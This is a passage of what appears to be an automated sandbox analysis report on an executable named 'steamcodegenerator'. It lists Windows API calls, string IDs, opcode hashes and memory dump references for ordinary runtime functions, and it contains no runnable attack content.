                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Concurrency::cancel_current_taskstd::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                          • String ID: bad locale name$false$true
                                                                                                                          • API String ID: 4121308752-1062449267
                                                                                                                          • Opcode ID: a0846c2aa12d742fa10dac8f3bd10f58a2c9fa8587503aeb1b9c9460052203b9
                                                                                                                          • Instruction ID: 06ab2c8a57ef350b7f1d5f46c63d325c1eddf0e20e7656321bba24b8e5bb039c
                                                                                                                          • Opcode Fuzzy Hash: a0846c2aa12d742fa10dac8f3bd10f58a2c9fa8587503aeb1b9c9460052203b9
                                                                                                                          • Instruction Fuzzy Hash: 74617F22A09B418AEB10EFA0E8502FCB7B4EF44754FA44534DB4D57AA6DF3DE459C720
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                          • String ID: csm$csm$csm
                                                                                                                          • API String ID: 849930591-393685449
                                                                                                                          • Opcode ID: a990464a9b0ebae1c73dc8e44a8328145eb2f0c0011acfcadcc99229f563dc94
                                                                                                                          • Instruction ID: 1974a637a503be3aafa8c776968667b425c405939da0cf1938fc6e1ac4088ba9
                                                                                                                          • Opcode Fuzzy Hash: a990464a9b0ebae1c73dc8e44a8328145eb2f0c0011acfcadcc99229f563dc94
                                                                                                                          • Instruction Fuzzy Hash: 86D18F32A08F418BEB20ABA598412FDB7B0FB457A8FA00135DB4D57B55DF38E585CB20
                                                                                                                          APIs
                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,?,00007FF71C06217D,?,?,?,?,00007FF71C056424,?,?,?,00007FF71C054660), ref: 00007FF71C06B570
                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,?,00007FF71C06217D,?,?,?,?,00007FF71C056424,?,?,?,00007FF71C054660), ref: 00007FF71C06B57C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressFreeLibraryProc
                                                                                                                          • String ID: api-ms-$ext-ms-
                                                                                                                          • API String ID: 3013587201-537541572
                                                                                                                          • Opcode ID: 485021a0a37bf4d08527970241f82041fbd12763ed629b207983ccd9ca274b15
                                                                                                                          • Instruction ID: ecdfc387f023275dc9dc1d74a6b5656d465a86bd820e30d148eca4e83a5a3a7c
                                                                                                                          • Opcode Fuzzy Hash: 485021a0a37bf4d08527970241f82041fbd12763ed629b207983ccd9ca274b15
                                                                                                                          • Instruction Fuzzy Hash: 0741C171B19F1281EA16AF96AC446F5A394BF44BB0FE84635DE1D47B84EF3CE4099320
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                          • String ID: f$p$p
                                                                                                                          • API String ID: 3215553584-1995029353
                                                                                                                          • Opcode ID: c526f3c0768fe9bb32e6b0cf3c5b34720bc9ff458adbcfce366da728eaeb86fb
                                                                                                                          • Instruction ID: 3d46f4b3da3263defc20ea967816c136d42c89fb4784d603a0dbacb27ae648f2
                                                                                                                          • Opcode Fuzzy Hash: c526f3c0768fe9bb32e6b0cf3c5b34720bc9ff458adbcfce366da728eaeb86fb
                                                                                                                          • Instruction Fuzzy Hash: F51292A1F0C96386FB247E9498546FDF691FB40764FE44235E789476C4DB3CE6888B20
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3215553584-0
                                                                                                                          • Opcode ID: 0bb0a586f61f888d0fabcc55a92c509517cdfc5ef6cb14ed48e5264dfe45f05a
                                                                                                                          • Instruction ID: 65f7b429c42f4c2691d24861debd1a11d37e28bc81ef3af61fb6256303daa204
                                                                                                                          • Opcode Fuzzy Hash: 0bb0a586f61f888d0fabcc55a92c509517cdfc5ef6cb14ed48e5264dfe45f05a
                                                                                                                          • Instruction Fuzzy Hash: 16C1B322B08F9685E661AF9598442FDB691EF81BA0FB54135EA5E03391DF7CEC4DC320
                                                                                                                          APIs
                                                                                                                          • LoadLibraryExW.KERNEL32(?,?,?,00007FF71C05E53E,?,?,?,00007FF71C05E230,?,?,?,00007FF71C05AE11), ref: 00007FF71C05E311
                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF71C05E53E,?,?,?,00007FF71C05E230,?,?,?,00007FF71C05AE11), ref: 00007FF71C05E31F
                                                                                                                          • LoadLibraryExW.KERNEL32(?,?,?,00007FF71C05E53E,?,?,?,00007FF71C05E230,?,?,?,00007FF71C05AE11), ref: 00007FF71C05E349
                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,00007FF71C05E53E,?,?,?,00007FF71C05E230,?,?,?,00007FF71C05AE11), ref: 00007FF71C05E3B7
                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,00007FF71C05E53E,?,?,?,00007FF71C05E230,?,?,?,00007FF71C05AE11), ref: 00007FF71C05E3C3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                          • String ID: api-ms-
                                                                                                                          • API String ID: 2559590344-2084034818
                                                                                                                          • Opcode ID: 3e1fd3a685f2033975e74a960ce108ae537942f5f0739880e328c386ea771c15
                                                                                                                          • Instruction ID: e6c507d88697b68b790f9c9122f1daff374d0f3f38e3ffa65bca6c57221d24cb
                                                                                                                          • Opcode Fuzzy Hash: 3e1fd3a685f2033975e74a960ce108ae537942f5f0739880e328c386ea771c15
                                                                                                                          • Instruction Fuzzy Hash: 9831B52161AF0192EB15BB92AC045B9A3A4BF14B70FE94535DE6D0B750EF3CE848C220
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                          • String ID: invalid string position$@F
                                                                                                                          • API String ID: 593203224-3046666360
                                                                                                                          • Opcode ID: 4a0e63c30155dbd531933714e4fb3250fae38a20e05bdf120d2de5344a78d97b
                                                                                                                          • Instruction ID: fb2d118290556d8372b8e6d18af6b319b16a728741f2468fd6b125b33d5ecbc7
                                                                                                                          • Opcode Fuzzy Hash: 4a0e63c30155dbd531933714e4fb3250fae38a20e05bdf120d2de5344a78d97b
                                                                                                                          • Instruction Fuzzy Hash: 41317E21A08F4286EA64FB95ED411F9A370EB54BA4FE90532DB4D03395DF3CE449C721
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Value$ErrorLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2506987500-0
                                                                                                                          • Opcode ID: 1be884a4e317a723df3c05ed33de2d7cd5181bc24a5a1d7764a1952c9c9cbb42
                                                                                                                          • Instruction ID: 257704bd86eb8d77d3a3abf4bfd7190719b66e9985303e10b66b2c2996bcc59e
                                                                                                                          • Opcode Fuzzy Hash: 1be884a4e317a723df3c05ed33de2d7cd5181bc24a5a1d7764a1952c9c9cbb42
                                                                                                                          • Instruction Fuzzy Hash: 37213E20F0CE6645F5547BE65E461B9F295AF487B0FF44634EA2E07AC6DF2CA4494220
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                          • String ID: CONOUT$
                                                                                                                          • API String ID: 3230265001-3130406586
                                                                                                                          • Opcode ID: 694d1561b49bf98eabe73384ab34ca1d62e8bc3aa0c95dc252714f74f68b0a54
                                                                                                                          • Instruction ID: da52f63b9aebe1a3a7e8516c8dd745a29c2b3ab98e28c02501b43b66dd255aa5
                                                                                                                          • Opcode Fuzzy Hash: 694d1561b49bf98eabe73384ab34ca1d62e8bc3aa0c95dc252714f74f68b0a54
                                                                                                                          • Instruction Fuzzy Hash: 82118431A18F4186E354AB86FC493B9A3A0FB48BF4F644234DA9D87B94DF3CD5488754
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharMultiStringWide
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2829165498-0
                                                                                                                          • Opcode ID: 56c1881ff080da115e17173811a025af0d6ab41ce3f93a68b9c841ae504a7f9c
                                                                                                                          • Instruction ID: 7ee871f1b3f1dfb772125a7330c8814fa7a00a3f3da7ce78442cf3db3401709e
                                                                                                                          • Opcode Fuzzy Hash: 56c1881ff080da115e17173811a025af0d6ab41ce3f93a68b9c841ae504a7f9c
                                                                                                                          • Instruction Fuzzy Hash: DB819E32A08B4183EB209FA198403B9A7E1FB547A8FA40631EF5D57BD4DF3CD5098720
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2081738530-0
                                                                                                                          • Opcode ID: 5b1032962b2f3603510ee43495ab5f1e8501dba359fef9820ab2aefd96205ff8
                                                                                                                          • Instruction ID: f3205c2358f2fb6123f49e418a074dfa841e6a6bad44eaeca81e0ba6235e77ab
                                                                                                                          • Opcode Fuzzy Hash: 5b1032962b2f3603510ee43495ab5f1e8501dba359fef9820ab2aefd96205ff8
                                                                                                                          • Instruction Fuzzy Hash: 1931A222A08E0286EA10BB95ED511F9A371FB44BB4FE84631DB5D47799DF3CE449C720
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2081738530-0
                                                                                                                          • Opcode ID: 6dd869cd8eb9f4e4568965f6fff9a5a75bd4238d98132b85c20296b06ff4c309
                                                                                                                          • Instruction ID: 5bc0c537c5563332eb67ae05632cb989f7b6307b4a4b1ad3480eaa8ecd79274e
                                                                                                                          • Opcode Fuzzy Hash: 6dd869cd8eb9f4e4568965f6fff9a5a75bd4238d98132b85c20296b06ff4c309
                                                                                                                          • Instruction Fuzzy Hash: D0317C21E09E4286EA15BB95EC411F8E770EB54BB4FA84632DB1D077A5DF3CE44A8330
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                                          • String ID: csm$csm$csm
                                                                                                                          • API String ID: 3523768491-393685449
                                                                                                                          • Opcode ID: 56b501d46a3a8898814a296027c8e3984b73c41ebf1f0af9fd66e92a0995a612
                                                                                                                          • Instruction ID: f19dcd34b0fb00bf3a8d74359b81e054f79aff9159c5c08726b77aca2836f069
                                                                                                                          • Opcode Fuzzy Hash: 56b501d46a3a8898814a296027c8e3984b73c41ebf1f0af9fd66e92a0995a612
                                                                                                                          • Instruction Fuzzy Hash: BCE19272A08F818BE710ABA4D8812FDB7B0FB49768F644235DB4D47655DF38E589CB10
                                                                                                                          APIs
                                                                                                                          • GetLastError.KERNEL32(?,?,00008ABED36B4165,00007FF71C064851,?,?,?,?,00007FF71C06F7CA,?,?,00000000,00007FF71C074803,?,?,?), ref: 00007FF71C06A41F
                                                                                                                          • FlsSetValue.KERNEL32(?,?,00008ABED36B4165,00007FF71C064851,?,?,?,?,00007FF71C06F7CA,?,?,00000000,00007FF71C074803,?,?,?), ref: 00007FF71C06A455
                                                                                                                          • FlsSetValue.KERNEL32(?,?,00008ABED36B4165,00007FF71C064851,?,?,?,?,00007FF71C06F7CA,?,?,00000000,00007FF71C074803,?,?,?), ref: 00007FF71C06A482
                                                                                                                          • FlsSetValue.KERNEL32(?,?,00008ABED36B4165,00007FF71C064851,?,?,?,?,00007FF71C06F7CA,?,?,00000000,00007FF71C074803,?,?,?), ref: 00007FF71C06A493
                                                                                                                          • FlsSetValue.KERNEL32(?,?,00008ABED36B4165,00007FF71C064851,?,?,?,?,00007FF71C06F7CA,?,?,00000000,00007FF71C074803,?,?,?), ref: 00007FF71C06A4A4
                                                                                                                          • SetLastError.KERNEL32(?,?,00008ABED36B4165,00007FF71C064851,?,?,?,?,00007FF71C06F7CA,?,?,00000000,00007FF71C074803,?,?,?), ref: 00007FF71C06A4BF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Value$ErrorLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2506987500-0
                                                                                                                          • Opcode ID: d929618738324d574e70838d51b97b836a85079287c8504ecfb6e89faa6b9b66
                                                                                                                          • Instruction ID: e496672b20381ca3ce81274bb39d6f4c796b728818c4d667f1eb1be3a71fedbf
                                                                                                                          • Opcode Fuzzy Hash: d929618738324d574e70838d51b97b836a85079287c8504ecfb6e89faa6b9b66
                                                                                                                          • Instruction Fuzzy Hash: B1114220F08E6241F5547BE66E461B9F2959F887B0FF44734D93E06BD6DF2CE4494260
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                          • String ID: bad locale name
                                                                                                                          • API String ID: 2967684691-1405518554
                                                                                                                          • Opcode ID: fd94d111b3a5a71e05e2fbcb881251465dc0f2d8c786bed247c494bd29d02914
                                                                                                                          • Instruction ID: de8a4d30de331d59f7c6f963c926fc9183672b4332b27c126473ac1add7062c1
                                                                                                                          • Opcode Fuzzy Hash: fd94d111b3a5a71e05e2fbcb881251465dc0f2d8c786bed247c494bd29d02914
                                                                                                                          • Instruction Fuzzy Hash: 46412522B49E418AFB14EFF0D8502FCB3B4AF44758FA44434DF4D26A96EF38955A9320
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                          • Opcode ID: 559c3951bd7f50195cdf89802e038081bfbf684ad2b4d9a1a4895f21a508b9c3
                                                                                                                          • Instruction ID: 0ac795df9d6ed2a74716dcfdb4eaddc7c5a13bfb190d608f9a1fa0ecee1c3214
                                                                                                                          • Opcode Fuzzy Hash: 559c3951bd7f50195cdf89802e038081bfbf684ad2b4d9a1a4895f21a508b9c3
                                                                                                                          • Instruction Fuzzy Hash: CEF04421B09F0681FA186BA4AC593B9A320AF45B71FE40635C6AD4A9E4CF3CD44DC320
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AdjustPointer
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1740715915-0
                                                                                                                          • Opcode ID: fe0cf1a3f0e36931d8326c1fa5e43f68e623f8e1a1bba44f29af81dcaff10926
                                                                                                                          • Instruction ID: ed538e78afea4afeae9b2eebe1d32182ba13bce65fb2ce6ca6a724a22b31ae41
                                                                                                                          • Opcode Fuzzy Hash: fe0cf1a3f0e36931d8326c1fa5e43f68e623f8e1a1bba44f29af81dcaff10926
                                                                                                                          • Instruction Fuzzy Hash: 04B1B631A0DF4283EA65AE959D412B9E3B4EF44BA0FA58435DB4D07B85DF2CF449CB20
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task__std_exception_copy__std_exception_destroy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1087005451-0
                                                                                                                          • Opcode ID: e056fb752b00353b83d650d62f1f17403a3bacc8c07260b3d954efaf1a3d08a7
                                                                                                                          • Instruction ID: 8c75a3474312153f37f02f4e542cff0ea8c7cfd8a98506bca22ec23a132230b7
